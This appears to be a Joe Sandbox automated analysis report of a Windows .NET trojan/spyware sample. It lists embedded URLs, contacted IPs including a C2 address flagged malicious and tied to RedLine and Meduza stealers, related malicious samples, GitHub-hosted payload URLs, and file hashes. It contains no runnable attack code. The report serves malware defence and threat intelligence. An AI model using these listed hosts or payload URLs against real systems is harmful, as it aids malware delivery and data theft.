                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RenewMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKeyMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://github.com9LrEuTWP8s.exe, 00000001.00000002.1531789671.000000000339B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            http://tempuri.org/example/Field1MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2006/02/addressingidentityMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://contoso.com/Licensepowershell.exe, 00000003.00000002.1475483757.00000000057B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://schemas.xmlsoap.org/soap/envelope/MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://tempuri.org/example/Field2MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://tempuri.org/example/Field3MSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1MSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trustMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://objects.githubusercontent.comd9LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  http://tempuri.org/DMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/06/addressingexMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://github.com9LrEuTWP8s.exe, 00000001.00000002.1531789671.00000000033AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2004/10/wscoorMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceMSBuild.exe, 00000008.00000002.1650116521.0000000002EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseMSBuild.exe, 00000008.00000002.1650116521.0000000002E71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
IP | Domain | Country | ASN | ASN Name | Malicious
140.82.121.4 | github.com | United States | 36459 | GITHUBUS | false
185.199.111.133 | objects.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
4.251.123.83 | unknown | United States | 3356 | LEVEL3US | true
                                                                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                Analysis ID:1554430
                                                                                                                                                                                                                                Start date and time:2024-11-12 14:49:13 +01:00
                                                                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                Overall analysis duration:0h 7m 56s
                                                                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                Report type:full
                                                                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                Number of analysed new started processes analysed:12
                                                                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                                                                Technologies:
                                                                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                                                                Sample name:9LrEuTWP8s.exe
                                                                                                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                                                                                                Original Sample Name:602a6a9693cdc77d1576ea6da66fd56e77c87a89ecef0d39b44563b93f8cc6b1.exe
                                                                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@11/11@2/3
                                                                                                                                                                                                                                EGA Information:
                                                                                                                                                                                                                                • Successful, ratio: 75%
                                                                                                                                                                                                                                HCA Information:
                                                                                                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                                                                                                • Number of executed functions: 378
                                                                                                                                                                                                                                • Number of non-executed functions: 23
                                                                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                                                                • Stop behavior analysis, all processes terminated
                                                                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                                                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 52.149.20.212, 52.165.164.15, 13.85.23.206, 20.3.187.198, 131.107.255.255
                                                                                                                                                                                                                                • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, slscr.update.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, dns.msftncsi.com, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                                                • Execution Graph export aborted for target 9LrEuTWP8s.exe, PID 7620 because it is empty
                                                                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                • VT rate limit hit for: 9LrEuTWP8s.exe
Time | Type | Description
08:50:18 | API Interceptor | 28x Sleep call for process: powershell.exe modified
08:50:25 | API Interceptor | 22x Sleep call for process: 9LrEuTWP8s.exe modified
08:50:37 | API Interceptor | 22x Sleep call for process: MSBuild.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
140.82.121.4 | RfORrHIRNe.doc | malicious | Unknown | github.com/ssbb36/stv/raw/main/5.mp3
185.199.111.133 | cr_asm2.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.111.133 | cr_asm_crypter.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.111.133 | cr_asm_hiddenz.ps1 | malicious | AsyncRAT, XWorm | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
185.199.111.133 | BeginSync lnk.lnk | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
4.251.123.83 | i4w1K6ft2F.exe | malicious | Meduza Stealer, PureLog Stealer, RedLine, zgRAT |
4.251.123.83 | xMYbN0Yd2a.exe | malicious | Meduza Stealer, PureLog Stealer, RedLine, zgRAT |
4.251.123.83 | FaZM14kDMN.exe | malicious | Meduza Stealer, PureLog Stealer, RedLine, zgRAT |
4.251.123.83 | j7movK82QT.exe | malicious | Meduza Stealer, PureLog Stealer, RedLine, zgRAT |
4.251.123.83 | Z4uyrnCQ8L.exe | malicious | Meduza Stealer, PureLog Stealer, RedLine, zgRAT |
4.251.123.83 | file.exe | malicious | Meduza Stealer, PureLog Stealer, RedLine, zgRAT |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
github.com | SecuriteInfo.com.Win32.MalwareX-gen.20028.17631.exe | malicious | AsyncRAT | 140.82.121.3
github.com | List Furniture.bat | malicious | Python Stealer, Braodo | 140.82.121.4
github.com | BB.bat | malicious | Braodo | 140.82.121.4
github.com | meN9qeS2DE.exe | malicious | XWorm | 140.82.121.3
                                                                                                                                                                                                                                            Payment Confirmation (237 KB).msgGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            19532311200120230008100 Responsabilidad Civil Contractual extracontractual.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            3KOX6gQCoE.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            QzX4KXBXPq.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                            • 140.82.121.3
                                                                                                                                                                                                                                            SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            malware-DONT-RUN.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            objects.githubusercontent.commeN9qeS2DE.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                                                                            Payment Confirmation (237 KB).msgGet hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                                                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                                                                            malware-DONT-RUN.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 185.199.109.133
                                                                                                                                                                                                                                            SecuriteInfo.com.Win64.Riskware.ExplorerPatcher.B.21185.8531.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                                                                            SecuriteInfo.com.Trojan.GenericKD.74442994.24259.8937.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                                                                            Pt7TlAjQtn.exeGet hashmaliciousAveMaria, WhiteSnake StealerBrowse
                                                                                                                                                                                                                                            • 185.199.109.133
                                                                                                                                                                                                                                            file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                                                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                                                                            SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 185.199.110.133
                                                                                                                                                                                                                                            SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            • 185.199.109.133
| Match | Associated Sample Name / URL | Detection | Threat Name | Context |
| FASTLYUS | https://renosuperstore.ca/shop/vanities/tesoro/tesoro-smally-collection/ | malicious | Unknown | 151.101.129.229 |
|  | https://t.ly/D5x5U | malicious | Braodo | 199.232.210.172 |
|  | 209cf93b79fb8eacd8c4837dfc24f707d5f4a212.html | malicious | HTMLPhisher | 151.101.2.137 |
|  | Selected_Items.vbs | malicious | FormBook | 185.199.109.133 |
|  | https://sv-management.solarflevoland.nl/wix | malicious | Unknown | 185.199.108.133 |
|  | https://gerneva.com | malicious | Unknown | 151.101.131.1 |
|  | https://protect-us.mimecast.com/s/18vfCQWNWqS1V8BlCPhEHGoqRR | malicious | Unknown | 151.101.129.140 |
|  | https://www.bing.com/ck/a?!&&p=35f7ac11749086c457664a8010a84bc638d369283c719578d3701e6e769d80e3JmltdHM9MTczMDg1MTIwMA&ptn=3&ver=2&hsh=4&fclid=33680f6e-3a94-6c3f-27a6-1a423bb96ddc&psq=site%3Ahttps%3A%2F%2FChiefOfStaff.site&u=a1aHR0cHM6Ly93d3cuY2hpZWZvZnN0YWZmLnNpdGUvd2hhdC1hcmUtdGhlLWtleS1wcmluY2lwbGVzLW9mLW9wZXJhdGlvbnMtbWFuYWdlbWVudA#taehwan.lee@hdel.co.kr | malicious | Outlook Phishing, HTMLPhisher | 151.101.2.137 |
|  | https://attack.mitre.org/techniques/T1204/001 | malicious | Lsass Dumper, Mimikatz, Trickbot | 185.199.108.153 |
|  | allpdfpro.msi | malicious | Unknown | 151.101.194.137 |
| LEVEL3US | i4w1K6ft2F.exe | malicious | Meduza Stealer, PureLog Stealer, RedLine, zgRAT | 4.251.123.83 |
|  | xMYbN0Yd2a.exe | malicious | Meduza Stealer, PureLog Stealer, RedLine, zgRAT | 4.251.123.83 |
|  | FaZM14kDMN.exe | malicious | Meduza Stealer, PureLog Stealer, RedLine, zgRAT | 4.251.123.83 |
|  | j7movK82QT.exe | malicious | Meduza Stealer, PureLog Stealer, RedLine, zgRAT | 4.251.123.83 |
|  | Z4uyrnCQ8L.exe | malicious | Meduza Stealer, PureLog Stealer, RedLine, zgRAT | 4.251.123.83 |
|  | botnet.x86.elf | malicious | Mirai, Moobot | 65.90.191.211 |
|  | sora.arm.elf | malicious | Mirai | 4.98.147.155 |
|  | DEMASI-24-12B DOC. SCAN.exe | malicious | GuLoader, Remcos | 4.150.155.223 |
|  | amen.arm6.elf | malicious | Mirai | 7.167.215.90 |
|  | amen.x86.elf | malicious | Mirai | 11.22.83.104 |
| GITHUBUS | SecuriteInfo.com.Win32.MalwareX-gen.20028.17631.exe | malicious | AsyncRAT | 140.82.121.3 |
|  | List Furniture.bat | malicious | Python Stealer, Braodo | 140.82.121.4 |
|  | BB.bat | malicious | Braodo | 140.82.121.4 |
|  | meN9qeS2DE.exe | malicious | XWorm | 140.82.121.3 |
|  | Payment Confirmation (237 KB).msg | malicious | HTMLPhisher, Tycoon2FA | 140.82.121.4 |
|  | 19532311200120230008100 Responsabilidad Civil Contractual extracontractual.bat | malicious | Unknown | 140.82.121.4 |
|  | 3KOX6gQCoE.bat | malicious | Unknown | 140.82.121.4 |
|  | QzX4KXBXPq.exe | malicious | LummaC | 140.82.121.3 |
|  | SecuriteInfo.com.Trojan.Siggen29.64132.8972.20040.exe | malicious | Unknown | 140.82.121.4 |
|  | malware-DONT-RUN.ps1 | malicious | Unknown | 140.82.121.4 |
                                                                                                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0ehttps://customization-connect-7617.my.salesforce.com/sfc/p/d3000000Byor/a/d300000000RR/ML8ajzoJU6aJIvGQZGZ6S9rRHpaD1XaytKzcNGEf56gGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                                                                            • 140.82.121.4
                                                                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                            • 185.199.111.133
                                                                                                                                                                                                                                            • 140.82.121.4
Booking_0731520.vbe | malicious | AgentTesla
• 185.199.111.133
• 140.82.121.4
https://shorten.is/meta_copyright_support_teamt5256 | malicious | Unknown
• 185.199.111.133
• 140.82.121.4
Fizetes_12112024.jpg.img | malicious | Snake Keylogger, VIP Keylogger
• 185.199.111.133
• 140.82.121.4
#U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253,jpg.img | malicious | Snake Keylogger, VIP Keylogger
• 185.199.111.133
• 140.82.121.4
file.exe | malicious | Amadey, Stealc, Vidar
• 185.199.111.133
• 140.82.121.4
Offer Document.exe | malicious | MassLogger RAT, PureLog Stealer
• 185.199.111.133
• 140.82.121.4
BL New Booking_ 021-34326093HL.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
• 185.199.111.133
• 140.82.121.4
Malzeme i#U00e7in G#U00f6rsel Sipari#U015fler #PO160924R0 _323282.exe | malicious | VIP Keylogger
• 185.199.111.133
• 140.82.121.4
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
C:\Users\user\AppData\Roaming\gdi32.dll | i4w1K6ft2F.exe | | malicious | Meduza Stealer, PureLog Stealer, RedLine, zgRAT | |
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\9LrEuTWP8s.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):271360
                                                                                                                                                                                                                                              Entropy (8bit):7.810825752992702
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:r0VLG6ytpg56d+Qa5BLhlEpZeVtveyqyC50G7hxWaZiHG6V:yLGNpEvnr+pZeVgyqyCPlsscG6V
                                                                                                                                                                                                                                              MD5:50CA49634420336958CE73629D9A2CF6
                                                                                                                                                                                                                                              SHA1:9653E0449A18DBDB8AF685F6B16B055CEA530139
                                                                                                                                                                                                                                              SHA-256:FC5DE864885DD6356C2FC91CFF867EFA50DD75856B26D41CB27194C8C0780AC2
                                                                                                                                                                                                                                              SHA-512:1839501BA5A1554C97EFA99493B565B8780C403750F9A46AD3FEE7F8A2073F0BEBC54AA79865A3CEA13A43C17D58665BD85E0BA2A8E9BA369EA34E0AEBDCE009
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\9LrEuTWP8s.exe
                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):847
                                                                                                                                                                                                                                              Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                              MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                              SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                              SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                              SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..
                                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2543
                                                                                                                                                                                                                                              Entropy (8bit):5.331950323785858
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HDfHKdHKLBHK7HKmTHQmHKtXoDHsLHqH5J:Pq5qHwCYqh3oPtI6eqzxTqdqlq7qqjqI
                                                                                                                                                                                                                                              MD5:D1C706335BBF6ECA4BECB0CACD9231EB
                                                                                                                                                                                                                                              SHA1:AC27DA2AC6FEC7C7F24C9796CB7BCECD5EF8F382
                                                                                                                                                                                                                                              SHA-256:45449CD3FC0C10386A37510D13C883FEF94883D11D757FDD0FFE4EDAF0DAAD75
                                                                                                                                                                                                                                              SHA-512:D5A4D33B362C4EF19CD0E43F2F518258EE45A1A32DED992B851276DF3BC8A4559E7D1872B155E10DAF1FF6B38C65AF472AF429B8362EBBB12976B3454C1FE68B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                                                                                                                              Process:C:\Path1\To2\Save444\uh3ex1.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                              Entropy (8bit):4.0050635535766075
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                                                                                                              MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                                                                                                              SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                                                                                                              SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                                                                                                              SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2232
                                                                                                                                                                                                                                              Entropy (8bit):5.379736180876081
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:tWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//MPUyus:tLHyIFKL3IZ2KRH9Ougss
                                                                                                                                                                                                                                              MD5:84D0B3B07B2FABFD5D0F3E724F41E2CE
                                                                                                                                                                                                                                              SHA1:8CB94823F1D28AA12678C877E2E1CF0D57CE5C69
                                                                                                                                                                                                                                              SHA-256:9F2745B3228D5DCFA4E9B4659F5A2A58A3446B7AECD20294BA34BF3A0312E0E3
                                                                                                                                                                                                                                              SHA-512:DAE272A0BB99FAB9A217FD4B448DE9847795636777DE9BA769A087DA5505BBCD5B5C29EE48C1241735A4F4AC9EF61E393B859C138D1F6244DF317A664D93375F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                              Process:C:\Path1\To2\Save444\uh3ex1.exe
